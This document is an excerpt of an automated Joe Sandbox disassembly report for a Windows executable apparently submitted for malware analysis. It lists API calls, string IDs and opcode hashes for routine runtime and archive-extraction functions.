                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                              • String ID: CorExitProcess$mscoree.dll
                                                              • API String ID: 4061214504-1276376045
                                                              • Opcode ID: b0311c574bf442a17911a3f8133534fec85e03a95d2687c47112b6b423385a3f
                                                              • Instruction ID: 10396bd087268f9e8ea43bc7e65de5af1d79846572bfde94014ef9d0bdc09ee9
                                                              • Opcode Fuzzy Hash: b0311c574bf442a17911a3f8133534fec85e03a95d2687c47112b6b423385a3f
                                                              • Instruction Fuzzy Hash: 11F06231A00608BBDB15AFA4DC09BDEBFB5FF44716F0042A9F905E2260DB349E55DA94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 0089081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00890836
                                                                • Part of subcall function 0089081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0088F2D8,Crypt32.dll,00000000,0088F35C,?,?,0088F33E,?,?,?), ref: 00890858
                                                              • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0088F2E4
                                                              • GetProcAddress.KERNEL32(008C81C8,CryptUnprotectMemory), ref: 0088F2F4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                              • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                              • API String ID: 2141747552-1753850145
                                                              • Opcode ID: cad2eb94f72ee75c55bb494bdbdc741576eba864bfd3bfd8b19db3dba4948a25
                                                              • Instruction ID: 6ef38eac7d06f4f5a640c923e358552d9b4b68b1fa0152d6c2f68a519ce3edb4
                                                              • Opcode Fuzzy Hash: cad2eb94f72ee75c55bb494bdbdc741576eba864bfd3bfd8b19db3dba4948a25
                                                              • Instruction Fuzzy Hash: A4E04F70950B119ECB21AB789C49B41BBD8FF04700F24892DE0EAE3741D6B8D5418B50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: AdjustPointer$_abort
                                                              • String ID:
                                                              • API String ID: 2252061734-0
                                                              • Opcode ID: 2f4be8ccd338ed6113991eaebea027cfbbbb03ecbce989e8a332498b3cab5a6c
                                                              • Instruction ID: 06569f67266c97ef3a16d941f7b264aa62232d365d91a9fd296a59e7d0e731b8
                                                              • Opcode Fuzzy Hash: 2f4be8ccd338ed6113991eaebea027cfbbbb03ecbce989e8a332498b3cab5a6c
                                                              • Instruction Fuzzy Hash: 2551C27150421AAFFB398F1CD845BAA77A5FF56320F24452DE802C7AA2E731ED40DB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetEnvironmentStringsW.KERNEL32 ref: 008ABF39
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 008ABF5C
                                                                • Part of subcall function 008A8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,008ACA2C,00000000,?,008A6CBE,?,00000008,?,008A91E0,?,?,?), ref: 008A8E38
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 008ABF82
                                                              • _free.LIBCMT ref: 008ABF95
                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 008ABFA4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                              • String ID:
                                                              • API String ID: 336800556-0
                                                              • Opcode ID: 534b5429fcbb1c902f3d1dacb4233c26642986924ec01bd48ffac606e90fcc1f
                                                              • Instruction ID: 6e5cfaed70e3979e2c99ce0d04c53b31c5aa76cd4c8fb244a698de8f45a74a52
                                                              • Opcode Fuzzy Hash: 534b5429fcbb1c902f3d1dacb4233c26642986924ec01bd48ffac606e90fcc1f
                                                              • Instruction Fuzzy Hash: 60018472605A157F3321167A5C4DC7B7B6DFEC3BA13180229F904C2542EF608D0195B1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetLastError.KERNEL32(?,008C1030,00000200,008A91AD,008A617E,?,?,?,?,0088D984,?,?,?,00000004,0088D710,?), ref: 008A986E
                                                              • _free.LIBCMT ref: 008A98A3
                                                              • _free.LIBCMT ref: 008A98CA
                                                              • SetLastError.KERNEL32(00000000,008B3A34,00000050,008C1030), ref: 008A98D7
                                                              • SetLastError.KERNEL32(00000000,008B3A34,00000050,008C1030), ref: 008A98E0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$_free
                                                              • String ID:
                                                              • API String ID: 3170660625-0
                                                              • Opcode ID: e078414bf1164ff64bf87d5a1afe5f61bcc70b2514026a3e0e3e3d5471fb5009
                                                              • Instruction ID: 0ecf9a88962a340637be9976bc2d40fa7767470c25f4ccb543b035d64bc4086f
                                                              • Opcode Fuzzy Hash: e078414bf1164ff64bf87d5a1afe5f61bcc70b2514026a3e0e3e3d5471fb5009
                                                              • Instruction Fuzzy Hash: 1701F436148A096BF21233386C8991B262DFFD37B47210234F955D2EA2EF38CC029166
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 008911CF: ResetEvent.KERNEL32(?), ref: 008911E1
                                                                • Part of subcall function 008911CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 008911F5
                                                              • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00890F21
                                                              • CloseHandle.KERNEL32(?,?), ref: 00890F3B
                                                              • DeleteCriticalSection.KERNEL32(?), ref: 00890F54
                                                              • CloseHandle.KERNEL32(?), ref: 00890F60
                                                              • CloseHandle.KERNEL32(?), ref: 00890F6C
                                                                • Part of subcall function 00890FE4: WaitForSingleObject.KERNEL32(?,000000FF,00891206,?), ref: 00890FEA
                                                                • Part of subcall function 00890FE4: GetLastError.KERNEL32(?), ref: 00890FF6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                              • String ID:
                                                              • API String ID: 1868215902-0
                                                              • Opcode ID: 3a86ed438b5c5eb156afe2d783b99a3066b3ea964fee2b11c343d1541d706dcb
                                                              • Instruction ID: a9cdf191db35029db1f80e04ddcb69d028dae76714d9d3ab76c8b79fc51ee7a9
                                                              • Opcode Fuzzy Hash: 3a86ed438b5c5eb156afe2d783b99a3066b3ea964fee2b11c343d1541d706dcb
                                                              • Instruction Fuzzy Hash: C3012571504B44EFCB32AB64DD85BC6FBA9FF08710F000929F16B925A0CB757A55CB54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • _free.LIBCMT ref: 008AC817
                                                                • Part of subcall function 008A8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,008AC896,008B3A34,00000000,008B3A34,00000000,?,008AC8BD,008B3A34,00000007,008B3A34,?,008ACCBA,008B3A34), ref: 008A8DE2
                                                                • Part of subcall function 008A8DCC: GetLastError.KERNEL32(008B3A34,?,008AC896,008B3A34,00000000,008B3A34,00000000,?,008AC8BD,008B3A34,00000007,008B3A34,?,008ACCBA,008B3A34,008B3A34), ref: 008A8DF4
                                                              • _free.LIBCMT ref: 008AC829
                                                              • _free.LIBCMT ref: 008AC83B
                                                              • _free.LIBCMT ref: 008AC84D
                                                              • _free.LIBCMT ref: 008AC85F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: cb622abb0d045f5b6e3280d9fa122a67824065242658ecf826f4bdcf5579c330
                                                              • Instruction ID: 33668a9284f9833b8173f4355749f555ad162bf4ae3ac57e68ccac2e3b99edb7
                                                              • Opcode Fuzzy Hash: cb622abb0d045f5b6e3280d9fa122a67824065242658ecf826f4bdcf5579c330
                                                              • Instruction Fuzzy Hash: 36F01D72504200EFA620EB7CE986C5A73E9FB02754B645829F249D7D52CB74FC80CA75
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • _wcslen.LIBCMT ref: 00891FE5
                                                              • _wcslen.LIBCMT ref: 00891FF6
                                                              • _wcslen.LIBCMT ref: 00892006
                                                              • _wcslen.LIBCMT ref: 00892014
                                                              • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0088B371,?,?,00000000,?,?,?), ref: 0089202F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: _wcslen$CompareString
                                                              • String ID:
                                                              • API String ID: 3397213944-0
                                                              • Opcode ID: 1536c09fbb071e428c64afdb959e3b2e0b821d70c9a27814a00e3dd057ab460e
                                                              • Instruction ID: 85a7309c5216d01460621771949f7b0b30e20c210ffec26fb1118832437ab04a
                                                              • Opcode Fuzzy Hash: 1536c09fbb071e428c64afdb959e3b2e0b821d70c9a27814a00e3dd057ab460e
                                                              • Instruction Fuzzy Hash: 6DF06D32008018BBDF226F54EC09D8A3F26FB51770B118005F61A9B461CB729661D690
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • _free.LIBCMT ref: 008A891E
                                                                • Part of subcall function 008A8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,008AC896,008B3A34,00000000,008B3A34,00000000,?,008AC8BD,008B3A34,00000007,008B3A34,?,008ACCBA,008B3A34), ref: 008A8DE2
                                                                • Part of subcall function 008A8DCC: GetLastError.KERNEL32(008B3A34,?,008AC896,008B3A34,00000000,008B3A34,00000000,?,008AC8BD,008B3A34,00000007,008B3A34,?,008ACCBA,008B3A34,008B3A34), ref: 008A8DF4
                                                              • _free.LIBCMT ref: 008A8930
                                                              • _free.LIBCMT ref: 008A8943
                                                              • _free.LIBCMT ref: 008A8954
                                                              • _free.LIBCMT ref: 008A8965
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: 4a98bf043db2db07cf44c90a2b4d33390dae09b8bd4dcf054553bb2dffbe510b
                                                              • Instruction ID: a46d85d8f5b23ef2e3c9551e86f90e2f75d2f048e069da927bbee53c45d3be1b
                                                              • Opcode Fuzzy Hash: 4a98bf043db2db07cf44c90a2b4d33390dae09b8bd4dcf054553bb2dffbe510b
                                                              • Instruction Fuzzy Hash: 2CF03AB5814162CB9A4A7F28FC824867FA9F7267107040706F215DB6B1DF7189419BA2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: _swprintf
                                                              • String ID: %ls$%s: %s
                                                              • API String ID: 589789837-2259941744
                                                              • Opcode ID: c6f81ad2ce395eba38eba54fdd53e8cd11b50871fd216ad99e1469240fd707d9
                                                              • Instruction ID: 7151b50380c61ea77408e2a958539c28da224bbd7a5b678152127a2d444d01c4
                                                              • Opcode Fuzzy Hash: c6f81ad2ce395eba38eba54fdd53e8cd11b50871fd216ad99e1469240fd707d9
                                                              • Instruction Fuzzy Hash: 8E51E67168C30BFAEE2236D48D4EF257665FB25B08F1C4516F386F44D1D5A29410B71B
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\o9jDrpZrgR.exe,00000104), ref: 008A7FAE
                                                              • _free.LIBCMT ref: 008A8079
                                                              • _free.LIBCMT ref: 008A8083
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: _free$FileModuleName
                                                              • String ID: C:\Users\user\Desktop\o9jDrpZrgR.exe
                                                              • API String ID: 2506810119-2110599003
                                                              • Opcode ID: 04750459e41da4cfe18bb168b01c09292a608752a3ff34feaae3da10a34da3b2
                                                              • Instruction ID: 6383108bac69df3cf5757b2c21cb7a19cebea777919ccf80172bdb63bb0fa44c
                                                              • Opcode Fuzzy Hash: 04750459e41da4cfe18bb168b01c09292a608752a3ff34feaae3da10a34da3b2
                                                              • Instruction Fuzzy Hash: 92318DB1A04658EFEB21DF99DC8199EBBFCFB96310F104166E504DB611DA708A44CB61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 008A31FB
                                                              • _abort.LIBCMT ref: 008A3306
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: EncodePointer_abort
                                                              • String ID: MOC$RCC
                                                              • API String ID: 948111806-2084237596
                                                              • Opcode ID: 2bedf975adeda2fad45e7be76f4c61321af21402595300669efce61a03d8bafb
                                                              • Instruction ID: 695ec70ad79b6a2c8222e0932464a64fcee4ffa62c1571a6aabbbf7bd2bc4a39
                                                              • Opcode Fuzzy Hash: 2bedf975adeda2fad45e7be76f4c61321af21402595300669efce61a03d8bafb
                                                              • Instruction Fuzzy Hash: 14417A71900209AFEF15DF98CC81AEEBBB5FF4A305F188059F904A7611E335EA50DB51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00887406
                                                                • Part of subcall function 00883BBA: __EH_prolog.LIBCMT ref: 00883BBF
                                                              • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 008874CD
                                                                • Part of subcall function 00887A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00887AAB
                                                                • Part of subcall function 00887A9C: GetLastError.KERNEL32 ref: 00887AF1
                                                                • Part of subcall function 00887A9C: CloseHandle.KERNEL32(?), ref: 00887B00
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                              • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                              • API String ID: 3813983858-639343689
                                                              • Opcode ID: 5148f7389cf943ce3d0905f8af8b3c54dc74593063a8fed9ad0df9cbb11fa969
                                                              • Instruction ID: db72dddacd37e4cb5c965ff0793524dd4567e2c8207c6164d46df438a02bef93
                                                              • Opcode Fuzzy Hash: 5148f7389cf943ce3d0905f8af8b3c54dc74593063a8fed9ad0df9cbb11fa969
                                                              • Instruction Fuzzy Hash: 1D319071904258AADF11FBA89C49FEE7BB9FB09314F144055F445E7282DB748A448B62
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 00881316: GetDlgItem.USER32(00000000,00003021), ref: 0088135A
                                                                • Part of subcall function 00881316: SetWindowTextW.USER32(00000000,008B35F4), ref: 00881370
                                                              • EndDialog.USER32(?,00000001), ref: 0089AD98
                                                              • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0089ADAD
                                                              • SetDlgItemTextW.USER32(?,00000066,?), ref: 0089ADC2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: ItemText$DialogWindow
                                                              • String ID: ASKNEXTVOL
                                                              • API String ID: 445417207-3402441367
                                                              • Opcode ID: 741660b4294bcb7b0380f8435a6fd26f13f928441a12c720763bba3dbe3b6664
                                                              • Instruction ID: 816b342876d8cc12449fb501163d3b7f00e7c1054723245006efe3de98dd6d2d
                                                              • Opcode Fuzzy Hash: 741660b4294bcb7b0380f8435a6fd26f13f928441a12c720763bba3dbe3b6664
                                                              • Instruction Fuzzy Hash: 1A119632340200BFDF15AF68DC49F6A7769FB4A742F140410F241DB5A0C7619E4597A3
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __fprintf_l.LIBCMT ref: 0088D954
                                                              • _strncpy.LIBCMT ref: 0088D99A
                                                                • Part of subcall function 00891DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,008C1030,00000200,0088D928,00000000,?,00000050,008C1030), ref: 00891DC4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                              • String ID: $%s$@%s
                                                              • API String ID: 562999700-834177443
                                                              • Opcode ID: 8993cb04932947b18f731d63e12f3ee01941a8c441f62e9d0e8c4626b96ad8a7
                                                              • Instruction ID: 4715d575b594bc327e4a381689b26c5379945251b67e21f1aa5b7b4e37245482
                                                              • Opcode Fuzzy Hash: 8993cb04932947b18f731d63e12f3ee01941a8c441f62e9d0e8c4626b96ad8a7
